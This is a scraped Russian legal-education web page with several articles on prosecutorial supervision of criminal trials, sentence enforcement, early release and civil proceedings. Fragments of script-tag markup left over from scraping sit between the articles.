Сегодня
НАВИГАЦИЯ:
ЮРИДИЧЕСКОЕ НАСЛЕДИЕ:
РАЗНОЕ:
РЕКЛАМА:
АРХИВ НОВОСТЕЙ:
Организация участия прокурора в рассмотрении судом уголовных дел
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Участие в рассмотрении районными и городскими судами уголовных дел осуществляют специально выделенные для этой цели заместитель или помощник районного или городского прокурора. Каждый из прокуроров, независимо от отрасли надзора, которой он ведает, обязан поддерживать в суде государственное обвинение по уголовным делам, эта функция присуща всем без исключения прокурорам. Координируют эту деятельность прокуроров руководители органов прокуратуры: прокуроры районов, городов, областей, краев и республик. Руководство работой районных и городских прокуратур по участию в рассмотрении судами уголовных дел возложено на прокуроров областей, краев и республик. В структуре этих прокуратур есть управления или отделы по надзору за рассмотрением уголовных дел в судах. В Генеральной прокуратуре Российской Федерации руководство этой работой осуществляет Управление по надзору за законностью судебных постановлений по уголовным делам. Указанные управления или отделы прокуратур субъектов РФ и Генеральной прокуратуры РФ не только руководят работой нижестоящих прокуратур по надзору за законностью и обоснованностью судебных приговоров, но и обеспечивают участие прокуроров в рассмотрении уголовных дел соответствующими судами субъектов РФ и Верховным Судом РФ, как по первой инстанции, так и в кассационном и надзорном порядке.
Работа управлений и отделов строится по зональному или предметному принципу. При зональном принципе за каждым прокурором отдела (управления) закрепляется несколько районных и городских прокуратур. Аналогично строится руководство и в Управлении Генеральной прокуратуры РФ. Прокурор Управления осуществляет руководство работой входящих в его зону прокуратур областей, краев и республик по рассмотрению уголовных дел по первой инстанции, а также по кассационному опротестованию незаконных и необоснованных приговоров, определений и постановлений суда, и оказывает им практическую помощь в организации этой работы. В круг обязанностей зонального прокурора входит непосредственное участие в рассмотрении Верховным Судом РФ в кассационном порядке уголовных дел, поступивших из судов его зоны, а также дел, рассмотренных коллегией по уголовным делам Верховного Суда РФ. Прокурор Управления сосредоточивает у себя данные о количестве
и видах (по основаниям) кассационных протестов прокуроров своей зоны, о результатах их рассмотрения.
При организации работы по предметному принципу (иногда его называют и отраслевым) за каждым прокурором закрепляется определенный участок работы. При этом одним прокурорам отдела (управления) поручается проверка дел, поступивших в кассационную инстанцию, и участие в их рассмотрении, другим - контроль за работой нижестоящих прокуроров по кассационному опротестованию приговоров, не вступивших в законную силу, по проверке \ жалоб и дел в порядке надзора. В некоторых прокуратурах сочетаются зональная и предметная формы организации работы. Такой принцип характерен для управлений и отделов крупных областных, краевых и республиканских прокуратур. При подобной организации одни прокуроры осуществляют надзор по зональному принципу, другие - по предметному. При решении вопроса о том, какой участок работы поручить тому или иному прокурору отдела (управления), учитываются его опыт и квалификация. Наиболее теоретически подготовленному и квалифицированному прокурору отдела или управления поручается, как правило, выполнение методической работы, связанной с проведением обобщений судебной и прокурорской практики по кассационной проверке уголовных дел. Этот прокурор организует также проведение учебно-методических семинаров и научно-практических конференций. В целях предупреждения ошибок в работе по кассационному опротестованию приговоров прокурор изучает каждый отозванный и отклоненный кассационный или частный протест, устанавливает допущенные ошибки и помогает прокурорам составлять правильные и обоснованные протесты. Прокурорский надзор за законностью приговоров, определений и постановлений суда по уголовным делам должен быть организован таким образом, чтобы он способствовал успешному выполнению судами всех инстанций стоящих перед ними задач по осуществлению правосудия по уголовным делам в строгом соответствии с законом (ст. 2 УПК). Только такой надзор будет по-настоящему действенным и эффективным. Для ответа на вопрос, было ли участие прокурора эффективным, надо выяснить: помогло ли суду его участие в судебном заседании принять правильное решение по делу; оказал ли судебный процесс воспитательное воздействие на аудиторию; были ли своевременно устранены нарушения материального закона и уголовно-процессуальных норм; как осуществлялась охрана прав и законных интересов подсудимого, потерпевшего и иных лиц, участвующих в уголовном судопроизводстве; какое влияние оказал прокурор на повышение качества дознания и предварительного следствия; способствовал ли он улучшению деятельности государственных органов, общественных организаций и должностных лиц по исполнению судебного приговора и т. д.
Задача, поставленная перед прокурором по активизации участия прокурора в рассмотрении судами уголовных дел, требует
дальнейшего совершенствования работы органов прокуратуры всех ее звеньев. В особенности важно правильно организовать эту работу в районных (городских) народных судах. Известно, что все без исключения звенья судебной системы рассматривают уголовные дела по первой инстанции, однако основная их масса (98,2%) разрешается по первой инстанции районными и городскими народными судами. Законность правосудия в стадиях кассационного и надзорного производства в конечном счете определяется уровнем деятельности судов первой инстанции.

прокурорский надзор

8c62e102eb25a895f68cc38af9975407.js" type="text/javascript">76c819a4e8b7da1196e3f493512e611f.js" type="text/javascript">fed3dbe722398eed3cd11c248656f2c3.js" type="text/javascript">
Коментариев: 0 | Просмотров: 1143 |
Сущность и задачи прокурорского надзора в стадии исполнения приговоров
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Исполнение приговоров - это завершающая стадия уголовного процесса, в которой происходит реализация вступивших в законную силу приговоров, определений и постановлений суда, а также разрешение судом вопросов, возникающих как при обращении приговора к исполнению, так и в ходе самого его исполнения. Когда вступивший в законную силу приговор будет обращен к исполнению и исполнен, судопроизводство по делу считается оконченным. В стадии исполнения приговора претворяется в жизнь решение, вынесенное судом по уголовному делу. Именно в этой стадии осуществляется одна из главных задач уголовного судопроизводства - исправлять осужденного, а также предупреждать совершение преступлений как им самим, так и со стороны других неустойчивых лиц. В борьбе с преступностью важно, чтобы приговор был своевременно и правильно обращен к исполнению и исполнен, ибо только при этом условии будет обеспечена реальность неотвратимости наказания за совершенное преступление. Своевременное и надлежащее исполнение приговора является одним из непременных условий эффективности уголовного наказания. И наоборот, несвоевременное и ненадлежащее исполнение приговора не только снижает эффективность судебного приговора, но и отрицательно сказывается на предупреждении правонарушений.
В судебной практике есть еще факты, когда приговоры судов несвоевременно обращаются к исполнению, в отдельных случаях суды не направляют в установленный срок в органы юстиции сообщений о вступлении приговора в законную силу, что на длительное время затягивает фактическое приведение приговора в исполнение, некоторые приговоры вовсе не исполняются и утрачивают свою законную силу по причине истечения срока давности уголовного преследования. Есть факты, когда осужденные к лишению свободы, но находящиеся длительное время на свободе, совершают новые, подчас более опасные преступления.
Вступившие в законную силу приговор, определение и постановление суда обязательны для всех государственных и общественных организаций, должностных лиц и граждан и подлежат исполнению на всей территории Российской Федерации (ст. 358 УПК). Это закрепленное в законе положение способствует успешному обращению к исполнению вступившего в законную силу приговора и устранению препятствий, которые могут встретиться при реализации предписаний суда, содержащихся в постановленном им приговоре. Однако само по себе это положение, закрепленное в законе, без вмешательства государственных органов, способствующих его фактическому исполнению, не может гарантировать успешное и своевременное исполнение приговоров. Прокурорский надзор за соблюдением законности в стадии исполнения приговоров является одним из тех процессуальных средств, которые обеспечивают реальное проведение этого закона в жизнь. Прокурор осуществляет надзор за тем, чтобы вступившие в силу приговоры приводились в исполнение, а не оставались лишь провозглашенными, и само исполнение производилось в полном соответствии с требованиями уголовного, уголовно-процессуального и уголовно-исполнительного законодательства.
В соответствии с требованиями Закона о прокуратуре (ст. 32), УПК (ст. 356-370) Генеральный прокурор РФ и подчиненные ему прокуроры осуществляют надзор в стадии исполнения приговоров с тем, чтобы: вступившие в законную силу приговоры своевременно и правильно обращались к исполнению; обращенные к исполнению приговоры приводились в исполнение в строгом соответствии с законом; содержание осужденных в местах лишения свободы производилось не иначе как по основаниям и в порядке, установленном законом; соблюдалось законодательство о порядке и условиях отбывания наказания, исправления и перевоспитания осужденных; обеспечивалось соблюдение установленных законом прав и обязанностей осужденных; исполнялось законодательство об условно-досрочном освобождении осужденных от отбывания наказания и досрочного освобождения осужденных по болезни.
В понятие исполнения приговоров включается как деятельность суда, исправительных учреждений (ИУ), общественных организаций, призванных способствовать исправлению и перевоспитанию осужденных, так и надзор органов прокуратуры за законностью деятельности этих государственных органов и общественных организаций. Прокурорский надзор за законностью исполнения приговоров является деятельностью строго процессуальной и представляет собой самостоятельную отрасль прокурорского надзора. Эта отрасль надзора существенно отличается от других отраслей как по методам его осуществления, так и по полномочиям прокурора. Прокурор не только проверяет законность правовых актов, издаваемых администрацией ИУ, но и осуществляет надзор за исполнением законов в процессе всей деятельности администрации ИУ. В деятельности администрации ИУ нет ни одного участка, который бы оставался вне сферы прокурорского надзора. Органами прокуратуры последовательно осуществляются мероприятия по неуклонному повышению эффективности надзора за исполнением законов в ИУ.
Существенно активизировался надзор после образования в 1985-1986 гг. специализированных прокуратур по надзору за соблюдением законов в ИУ. Прокуроры стали чаще проверять законность деятельности администрации ИУ, глубже вникать в проблемы исправления осужденных, проявлять инициативу и настойчивость в установлении и устранении нарушений законности. Вместе с тем состояние прокурорского надзора в данном направлении продолжает оставаться не всегда удовлетворительным, отвечающим современным требованиям. Обобщением, проведенным Генеральной прокуратурой РФ, установлено заметное ухудшение состояния законности в ИУ. За последнее время возросло количество преступлений, совершаемых в исправительных колониях и тюрьмах. Ежегодно в местах лишения свободы совершается большое число убийств. Совершаются нападения на лиц из состава администрации ИУ. Нарушая порядок отбывания наказания, некоторые осужденные, в особенности из числа неоднократно судимых, совершают опасные преступления, нередко с применением холодного и огнестрельного оружия. С каждым годом возрастает количество массовых беспорядков, нарушений режима содержания осужденных.

прокурорский надзор

449c7c5246d3a7cb56ccc7c9d775813a.js" type="text/javascript">3ed68cb3a76354459dd5ddab8b73334a.js" type="text/javascript">8b126dd634fef0ffbf4e6c70019d0210.js" type="text/javascript">
Коментариев: 0 | Просмотров: 1250 |
Надзор за законностью обращения к исполнению приговоров
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Обращение приговора к исполнению возложено на суд, постановивший приговор (ст. 359 УПК). Распоряжение об исполнении приговора направляется судьей или председателем суда тому органу, на который возложена обязанность приведения приговора в исполнение. Прокурор следит за тем, чтобы установленный порядок обращения приговоров к исполнению строго соблюдался. Обращая приговор к исполнению, судья направляет распоряжение: 1) администрации следственного изолятора, если осужденный приговорен к лишению свободы и к моменту постановления приговора содержится под стражей; 2) начальнику местного (районного, городского) органа юстиции, когда осужденный к лишению свободы к моменту обращения приговора к исполнению находится на свободе; 3) уголовно-исполнительной инспекции районного (межрайонного) или городского отдела управления органов юстиции при осуждении виновного к исправительным работам; 4) судебному приставу-исполнителю - в случае необходимости взыскания штрафа, осуществления конфискации имущества, взыскания причиненного материального ущерба и возмещения гражданского иска; 5) администрации предприятия, учреждения или организации в случаях назначения судом такой меры наказания, как увольнение от должности; 6) органам управления различных ведомств, если осужденный лишен права занимать определенные должности или заниматься определенной деятельностью; 7) военному командованию, если осужденный подлежит направлению в дисциплинарную воинскую часть.
Необходимо подчеркнуть, что надзор прокурора в сфере обращения приговора к. исполнению распространяется на весьма широкий круг органов и должностных лиц, причастных к исполнению судебных приговоров. К их числу следует отнести суды, судебных приставов, органы юстиции, в том числе инспекции и отделы исправительных работ, исправительные учреждения, наблюдательные комиссии при местных органах самоуправления, финансовые, медицинские учреждения и т. д. Прокурор следит за тем, чтобы действия этих должностных лиц, государственных органов и общественных организаций строго соответствовали закону, чтобы предписания суда, содержащиеся в приговоре, своевременно и точно исполнялись. Осуществляя надзор в стадии исполнения приговора, прокурор использует различные формы своей деятельности и применяет присущие этой деятельности средства реагирования на обнаруженные нарушения закона. В необходимых случаях он приносит протест на
незаконные акты судебного пристава или вносит представления в органы суда, местные учреждения юстиции или внутренних дел с предложением устранить допущенное нарушение закона.
На прокурора возлагается обязанность осуществлять надзор за соблюдением установленной законом своевременности обращения приговора к исполнению, чтобы обвинительный приговор приводился в исполнение по истечении установленного законом срока на его обжалование или по оставлении его в силе вышестоящим судом. В соответствии со ст. 356 УПК вступивший в законную силу приговор обращается к исполнению судом, постановившим приговор, не позднее трех суток со дня его вступления в законную силу или возвращения дела из кассационной инстанции.
Оправдательный приговор и приговор, освобождающий осужденного от отбывания наказания, обращается к исполнению немедленно по его провозглашении. В случае нахождения подсудимого под стражей суд освобождает его из-под стражи в зале судебного заседания.
В тех случаях, когда кассационная инстанция принимает решение об освобождении осужденного из-под стражи в связи с прекращением дела или заменой лишения свободы иным наказанием, не связанным с лишением свободы, копия определения в течение суток направляется непосредственно администрации места лишения свободы, минуя суд первой инстанции (ст. 354 УПК). Если кассационная инстанция выносит определение об отсрочке исполнения обжалованного или опротестованного приговора, то копия определения направляется также администрации места лишения свободы. Определение кассационной инстанции подлежит немедленному исполнению. Прокурор следит также и за тем, чтобы суды в целях повышения воспитательного и предупредительного воздействия направляли копии приговоров по месту работы, учебы или месту жительства осужденного.
Говоря о прокурорском надзоре за законностью обращения приговоров к исполнению, следует подчеркнуть, что прокуроры уделяют большее внимание надзору за законностью исполнения приговоров, связанных с лишением свободы, и не всегда осуществляют должный надзор за законностью исполнения приговоров, связанных с иными видами как основного, так и дополнительного наказания, а также за исполнением законов по различного рода имущественным взысканиям. Вот почему Генеральный прокурор РФ в приказе № 8 от 26 февраля 1997 г. привлекает внимание прокуроров к осуществлению должного надзора за своевременностью и правильностью исполнения всех, без исключения, судебных приговоров. В связи с этим необходимо раскрыть некоторые особенности прокурорского надзора за исполнением судебных приговоров, связанных с различного вида наказаниями. Прокурор должен следить за соблюдением установленного законом (ст. 368 УПК) правила: если приговор приводится в исполнение вне района деятельности суда (судьи, мирового судьи), постановившего приговор, то эти вопросы разрешаются мировым судьей по делам, отнесенным к его подсудности, и судьей одноименного суда, по остальным делам при отсутствии в районе исполнения приговора одноименного суда или мирового судьи - судьей вышестоящего суда. В этом случае копия постановления направляется суду (судье, мировому судье), постановившему приговор.

прокурорский надзор

0c787ecc76d116dc67a193ad03d71770.js" type="text/javascript">bd80ed4d61a6cf68facb546376f6c64c.js" type="text/javascript">5a3a6319c5995c07b3c92fc8a2ebe95f.js" type="text/javascript">
Коментариев: 0 | Просмотров: 511 |
Надзор за законностью исполнения приговоров, связанных с лишением свободы
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Надзор за исполнением законов в местах лишения свободы представляет собой наиболее трудный участок в деятельности прокуроров. Это определяется прежде всего сложностью контингента отбывающих наказание, в особенности в тюрьмах и исправительных колониях строгого и особого режимов. В местах лишения свободы отбывает наказание одновременно около миллиона осужденных. Осуществляя надзор за исполнением законов в исправительной или в воспитательной колониях для несовершеннолетних, прокурор прежде всего проверяет законность и обоснованность водворения осужденного в колонию определенного режима, избранного судом или судьей при постановлении приговора. Прокурор делает это путем ознакомления с судебным приговором.
Прокурорам, осуществляющим надзор в исправительных учреждениях, надлежит иметь в виду, что в связи с постановлением Верховного Совета Российской Федерации от 21 января 1993 г. "О временных следственных изоляторах, расположенных на территории исправительно-трудовых колоний, для содержания осужденных, в отношении которых приговоры не вступили в законную силу", в исправительных учреждениях наряду с осужденными, приговоры в отношении которых вступили в законную силу и обращены к исполнению, могут содержаться лица, приговоры в отношении которых находятся в стадии кассационного производства'.
В исправительные колонии направляются осужденные, содержащиеся в наиболее переполненных следственных изоляторах. Из установившейся практики должны быть исключены случаи, когда в ИУ направляются лица, находящиеся под следствием, причем перевод этих лиц из следственных изоляторов не согласовывается со следователем; в ряде случаев переведенные в ИУ осужденные размещаются совместно с осужденными, приговоры в отношении которых находятся в стадии исполнения; некоторые осужденные размещаются в колониях особого режима, что категорически запрещено постановлением Верховного Совета от 21 января 1993 г.; в отдельных случаях перевод осужденных в ИУ производится без согласия на это самого осужденного, приговор в отношении которого находится в стадии кассационного рассмотрения. Согласие осужденного - непременное условие выполнения этого процессуального действия. Прокурор осуществляет надзор за тем, чтобы начальник следственного изолятора направлял осужденных только в ИУ тех регионов, перечень которых указан Верховным Советом Российской Федерации в приложении к его постановлению от 21 января 1993 г.
Весьма целесообразно, чтобы осужденные в ожидании кассационной проверки приговора направлялись в ИУ того режима, который был определен судом в приговоре: общего режима - в колонию общего режима, усиленного - в колонию усиленного режима и т. д. Это не вызовет необходимости дальнейшего этапирования осужденного в другую колонию, он может отбывать наказание в той колонии, в Которую направлен в ожидании вступления приговора в законную силу. Следует иметь в виду, что срок кассационного производства по крупным, групповым и многоэпизодным делам занимает в ряде случаев значительное время - от двух до шести месяцев.
Прокурор проверяет, чтобы эта категория осужденных не имела контактов с лицами, отбывающими наказание: может случиться так, что в кассационном порядке дело будет прекращено производством, изменена юридическая оценка преступления или снижена мера наказания с освобождением осужденного из-под стражи.
В случаях, когда прокурор признает, что перевод осужденного в ИУ является незаконным или необоснованным, он в порядке, установленном ст. 32 Закона о прокуратуре, своим постановлением возвращает осужденного в следственный изолятор.
В предмет прокурорского надзора включается соблюдение режима, установленного в ИУ. В местах лишения свободы должны быть созданы такие условия, чтобы они могли обеспечить: обязательную охрану и изоляцию всех осужденных, в особенности в колониях особого режима камерного типа; постоянный надзор и контроль за осужденными как в рабочей, так и в жилой зонах; раздельное содержание осужденных как по полу, так и по характеру совершенных преступлений; приобщение осужденных к труду, а несовершеннолетних и к получению образования, строгое исполнение ими своих обязанностей; участие осужденных в общественной жизни колонии.
Прокурор обращает особое внимание на то, чтобы перевод осужденных из одной колонии в другую, а также из колонии в тюрьму и наоборот производился в строгом соответствии с законом. В обязанности прокурора входит проверка законности расконвоирования отдельных осужденных, чтобы это не было одним из видов привилегий и поблажек некоторым осужденным.
В случае обнаружения лиц, незаконно содержащихся под стражей, прокурор своим постановлением освобождает их (ст. 33 Закона о прокуратуре). Незаконно содержащимися под стражей являются лица, которые: а) подлежали освобождению по окончании срока наказания, помилованию или амнистии, но не были по каким-то причинам освобождены; б) должны быть освобождены в связи с пересмотром приговора в порядке надзора со снижением наказания, но продолжают содержаться в колонии; в) были условно-досрочно или по болезни судом освобождены, но по каким-либо причинам были задержаны в колонии.9aad956d3ff925eb8b4a9f555d20a391.js" type="text/javascript">

прокурорский надзор

8491893fb25f5291d146dc3c1c3ecb54.js" type="text/javascript">e9f582532c2c669beb64ec2b09430e0c.js" type="text/javascript">1e2f8117b7f25c642401580b220dd402.js" type="text/javascript">
Коментариев: 0 | Просмотров: 410 |
Надзор за законностью исполнения приговоров; связанных с исправительными работами
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Действующее уголовное законодательство предусматривает наказание в виде применения исправительных работ. Осуществляя надзор за законностью исполнения приговора в отношении лиц, которым назначены к отбыванию исправительные работы, прокурор следит за тем, чтобы районные (межрайонные) и городские уголовно-исполнительные инспекции вели строгий персональный учет всех
осужденных, отбывающих наказание в пределах района (районов) или города, оказывали содействие в трудоустройстве лицам, осужденным к исправительным работам, следили за соблюдением предприятиями, учреждениями и организациями порядка и условий отбывания наказания и правильностью удержания и перечисления удержанных сумм в доход государства из заработной платы осужденных.
В необходимых случаях инспекции должны оказывать осужденным помощь в трудоустройстве. Если осужденные злостно уклоняются от исполнения приговора, то прокурор дает указание уголовно-исполнительной инспекции и одновременно территориальному отделу милиции о розыске осужденного и направлении материала в суд для замены неотбытого срока исправительных работ лишением свободы из расчета один день лишения свободы за три дня исправительных работ (ст. 50 УК). Прокурор следит за тем, чтобы исправительные работы отбывались по месту их работы в районе жительства осужденных с учетом их трудоспособности. Прокурор своим вмешательством должен предупредить обращение к исполнению приговора, связанного с исправительными работами, когда это наказание назначено нетрудоспособным лицам, несовершеннолетним, не достигшим 16-летнего возраста, а также неработающим женщинам, имеющим на иждивении малолетних детей или находящихся в состоянии беременности. Обнаружив эти нарушения, прокурор приносит протест на незаконный приговор, с тем, чтобы исправительные работы были заменены иным, более мягким наказанием с учетом тяжести преступления и личности осужденного.
В обязанности прокуроров входит также надзор за законностью отбывания исправительных работ по месту работы. Отбывание этой меры наказания не должно быть связано с выполнением осужденным служебных или профессиональных обязанностей, когда оставление виновных на прежней работе может привести к снижению воспитательного и предупредительного воздействия назначенного
наказания.

прокурорский надзор

f2a8d9c47810cceb4a12b092d40da5aa.js" type="text/javascript">f14cbba69bd1ee7f4b425cad325d3deb.js" type="text/javascript">466b77b5b7fdd5f43cbc8b2b8e5599b8.js" type="text/javascript">
Коментариев: 0 | Просмотров: 404 |
Надзор за законностью досрочного освобождения осужденных от отбывания наказания
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Действующее законодательство (ст. 79, 81 УК РФ) предусматривает широкие возможности досрочного освобождения от отбывания наказания лиц, осужденных за совершение преступлений, делая эти меры поощрения одним из важнейших стимулов исправления осужденных. Существенное расширение контингента осужденных, к которым может быть применено досрочное освобождение от отбывания наказания, значительно повышает ответственность администрации исправительных учреждений, органов суда, прокуратуры общественных организаций за принятие законного и обоснованного решения о досрочном освобождении осужденного, так же как и за необоснованный отказ в досрочном освобождении.
При наличии установленных законом условий к осужденным могут быть применены условно-досрочное освобождение от отбывания наказания и закон о досрочном освобождении может быть применен также к лицам, заболевшим в период отбывания наказания
психической или иной тяжелой болезнью (см. ст. 81 УК). Правильность применения законов о досрочном освобождении осужденных от отбывания наказания зависит в существенной мере от действенности прокурорского надзора. Ошибки в применении закона о досрочном освобождении осужденного дискредитируют в глазах широкой общественности исправительную политику нашего государства, формируют ошибочные представления о безнаказанности преступников, тем более, если досрочно освобожденный впоследствии совершает тяжкое преступление или уклоняется от труда и ведет паразитический образ жизни.
Рассмотрим некоторые особенности прокурорского надзора по каждому из указанных выше видов досрочного освобождения осужденных от отбывания наказания.
Осуществляя надзор за законностью применения закона (ст. 363 УПК) об условно-досрочном освобождении, прокурор проверяет как соблюдение установленного порядка представления осужденных к этой мере поощрения, так и соответствие закону судебных решений. Однако некоторые прокуроры формально выполняют свои обязанности, явно Недооценивая процессуальное значение условно-досрочного освобождения как важного стимула к исправлению осужденных.
В связи с этим Генеральный прокурор РФ в приказе № 8 от 26 февраля 1997 г. предлагает прокурорам: "Регулярно проверять законность досрочного освобождения от отбывания наказания, а также установления административного надзора за лицами, освобожденными из мест лишения свободы".
Задача прокурора состоит в том, чтобы не допустить, с одной стороны, досрочного освобождения из мест лишения свободы осужденных, не вставших на путь исправления, а с другой стороны, исключить из практики случаи отказа в применении этой меры поощрения к тем, кто этого заслуживает. Прокурор в целях предупреждения или устранения нарушения закона при применении закона об условно-досрочном освобождении осужденных применяет следующие меры: 1. Еще до судебного заседания прокурор тщательно изучает материалы, содержащие представление администрации исправительного учреждения, согласованное с наблюдательной комиссией об условно-досрочном освобождении осужденного. Иногда администрация ИУ представляет к условно-досрочному освобождению осужденных, к которым в силу закона условно-досрочное освобождение вообще применено быть не может. В таких случаях прокуроры предупреждают направление в суд таких материалов, а если этого сделать не удалось, дают в судебном заседании заключение об отказе в применении условно-досрочного освобождения.880f43bb149a3cdf08e47ae3729f240b.js" type="text/javascript">870605ae68481732cc5d2bad9520a36echar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)733e10eca8f334cdd275831f001ef44a.js" type="text/javascript">d6739f4c0afab9edea3c14f12abc8d12.js" type="text/javascript">c69aec22e529199fc7290ce377dc9674.js" type="text/javascript">9556bcd742e07084be4408ff1d7497d9.js" type="text/javascript">1b7ac6fb2e9cacf532625c236bdc00ae.js" type="text/javascript">4fe95d8c755e41e37bf2c67a4014b8cb.js" type="text/javascript">b03cccfa147dbb09df2a4f2e89b6c128.js" type="text/javascript">fead81c346161e852746dcaff3394665.js" type="text/javascript">cd7919355a68eb645cd25f3526d82827.js" type="text/javascript">f7d9ef2d2dc592d9573483ec243a9d03.js" type="text/javascript">7dafcbba050ec60ffb85cfde5053c1c1.js" type="text/javascript">
Коментариев: 0 | Просмотров: 801 |
Сущность и задачи участия прокурора в рассмотрении судами гражданских дел
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
В судах Российской Федерации ежегодно рассматривается свыше двух миллионов гражданских дел. Около 90% заявленных исков удовлетворяется судами. Это свидетельствует об обоснованности заявляемых исков и возросшей активности граждан по защите своих прав и охраняемых законом интересов.
Осуществление выработанного стратегического курса на укрепление социально-экономического развития, качественное преобразование всех сторон жизни нашего общества, переход на новые методы хозяйствования расширяют сферу применения правовых норм, регулирующих жилищные, трудовые, имущественные и другие правоотношения.
В связи с расширением компетенции судов по разрешению споров гражданско-правового характера растет из года в год число гражданских дел по спорам о жилище. Дела этой категории среди всех иных категорий гражданских дел, рассматриваемых судами по первой инстанции, составляют свыше 10%. Количество гражданских дел о праве на жилище за последнее время неизмеримо возрастает в связи с приватизацией жилья. Процессуальное значение судебного рассмотрения этих дел определяется тем, что принятие судом по ним правосудного решения связано с охраной конституционных прав граждан на жилище.
Увеличивается число исков о восстановлении на работе, выплате заработной платы рабочим и служащим, о расторжении брака2. Правильное разрешение судом бракоразводных дел имеет важ-
1 Федеральный закон "О внесении изменений и дополнений в Гражданский процессуальный кодекс РСФСР" от 7 августа 2000 г. № 120-ФЗ (Российская газета 2000. 15 авг.) внес в действующий ГПК новую главу 35 "Аппеляционное производство по пересмотру решений и определений мировых судей" (ст. 318'-31816) и изменения в целый ряд статей, регулирующих деятельность суда, а следовательно, и прокуроров, участвующих в рассмотрении гражданских дел. Так как большинство дополнений и изменений в ГПК связано с регулированием деятельности мировых судей, а процесс их назначения (избрания) далеко не завершен, то деятельность прокурора по исполнению и надзору за исполнением этих внесенных в ГПК изменений и дополнений в настоящей главе специально не рассматривается.
В связи с изменением трудового законодательства существенно трансформирован порядок рассмотрения споров, возникающих между участниками производственного процесса. Значительный удельный вес среди трудовых дел занимают дела о восстановлении на работе. Причем следует отметить, что суд восстанавливает на прежней работе каждого второго из числа обратившихся в суд с исковым заявлением.
Возникают неизвестные ранее споры имущественного характера, разрешаемые в суде, между участниками предприятий, созданных совместно с зарубежными странами, в том числе странами СНГ.
Особое место в гражданском судопроизводстве занимает рассмотрение судами жалоб на неправомерные действия государственных органов и должностных лиц, ущемляющих права и законные интересы граждан.
Сложность задач, стоящих перед судами при разрешении ими споров, вызывает необходимость активизации участия прокуроров в сфере гражданского судопроизводства, в обеспечении прав и охраняемых законом интересов граждан, государства, предприятий, организаций. Участие прокурора в гражданском судопроизводстве является одной из существенных гарантий вынесения судами всех инстанций законных и обоснованных решений, определений и постановлений. Между тем, как показывает практика участия прокуроров в гражданском судопроизводстве, прокурорский надзор не всегда был способен противостоять нарушениям законности. Прокуроры не в полной мере используют предоставленные им полномочия для надежной охраны собственности, всемерного укрепления прав и законных интересов физических и юридических лиц.
Не все прокуроры ведут бескомпромиссную борьбу с нарушениями закона о правах и интересах граждан, с нарушениями принципа социальной справедливости, проявлениями бюрократизма, волокиты, бездушного отношения к людям. Прокурорский надзор за законностью решений, постановлений и определений, издаваемых в гражданском судопроизводстве, не всегда способствовал достижению целей правосудия.
Все это выдвигает необходимость совершенствовать деятельность прокуроров в гражданском судопроизводстве, чтобы она стала надежной гарантией соблюдения законности в этой отрасли права, способствовала вынесению судами законных и обоснованных решений.bcd58a11e5115370d65c7e0b76aec824.js" type="text/javascript">e835082d87b4992d4fe0617e8c535bafchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)edf345ec6e12bd56b4df63dd1d46345a.js" type="text/javascript">96b158f6e37d3752a30f2d0e7c999321.js" type="text/javascript">286fd8d2ca121d37814c1a0d108928f2.js" type="text/javascript">c93a5a1475078b0dce880ad3283c0435.js" type="text/javascript">8e5b6ec14d7dad3aaadcbf4bc9580aad.js" type="text/javascript">ee61947c86861bd5522f15972799ad39.js" type="text/javascript">06d2b0526fcb66f525aa325bc01650c5.js" type="text/javascript">8c69152439b38c8a7d555339dd855bff.js" type="text/javascript">8d8c9a5a6a4dc42e95435649d2f76052.js" type="text/javascript">c3a8d4005d3c0ebd838239451afac50f.js" type="text/javascript">badb3e65de6f18146229197c6f0c9edf.js" type="text/javascript">
Коментариев: 0 | Просмотров: 643 |
Участие прокурора в рассмотрении гражданских дел судом первой инстанции
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Участие прокурора в рассмотрении гражданских дел в суде первой инстанции осуществляется в формах предъявления и поддержания в суде иска, а также участия в рассмотрении судом гражданских дел и дачи заключения.
Предъявление прокурором иска. Прокурор не обладает правом применения мер принуждения к лицам, виновным в нарушении закона. Однако он не может оставаться безучастным, если возникает необходимость устранить нарушение закона, восстановить нарушенные права и охраняемые законом интересы государства, предприятий, организаций и граждан. В этих целях ему предоставлено право обратиться в суд с исковым заявлением, чтобы посредством судебного воздействия восстановить нарушенный закон. Предъявление прокурором иска является одним из средств его реагирования на установленные нарушения закона.
Процессуальное положение прокурора, внесшего исковое заявление, характеризуется некоторыми особенностями, отличающими его от иных лиц, заявляющих иск. Прокурор не несет судебных расходов по заявленному иску. Ему не может быть отказано в принятии искового заявления. Только в одном случае, когда у лица, в интересах которого предъявляется иск, нет права на обращение в суд, прокурору может быть отказано в принятии искового заявления. К прокурору нельзя предъявить встречный иск. Ответчик может предъявить встречный иск лишь к лицу, в интересах которого прокурор предъявил иск. Решение суда по иску прокурора распространяется не на прокурора, а на лицо, в интересах которого заявлен иск. Прокурор не вправе совершать процессуальные действия, свойственные стороне: заключать мировое соглашение, передавать дело в третейский суд. "'
Свои полномочия по предъявлению исков прокуроры используют главным образом тогда, когда необходимо защитить имущественные интересы государства, предприятий и организаций. Возмещение материального ущерба, причиненного правонарушениями, нередко связано с необходимостью проявлять прокурорами принципиальность в борьбе с местничеством и ведомственными интересами. Прокурор использует предоставленное ему законом право предъявления иска лишь в тех случаях, когда виновное лицо уклоняется или отказывается добровольно возместить ущерб. В случаях добровольного возмещения материального ущерба прокурору следует оказать руководителям предприятий, а также юридической службе необходимую правовую помощь, создавая обстановку неотвратимости ответственности должностных лиц предприятий и организаций за невыполнение требований законодательства о привлечении к ответственности работников, по вине которых причинен материальный ущерб.
Свои полномочия по предъявлению исков прокурор использует также при защите интересов несовершеннолетних, инвалидов, престарелых, многодетных родителей, лиц, находящихся под опекой или попечительством, военнослужащих, то есть тех, кто не имеет возможности самостоятельно обратиться в суд за защитой своих интересов.
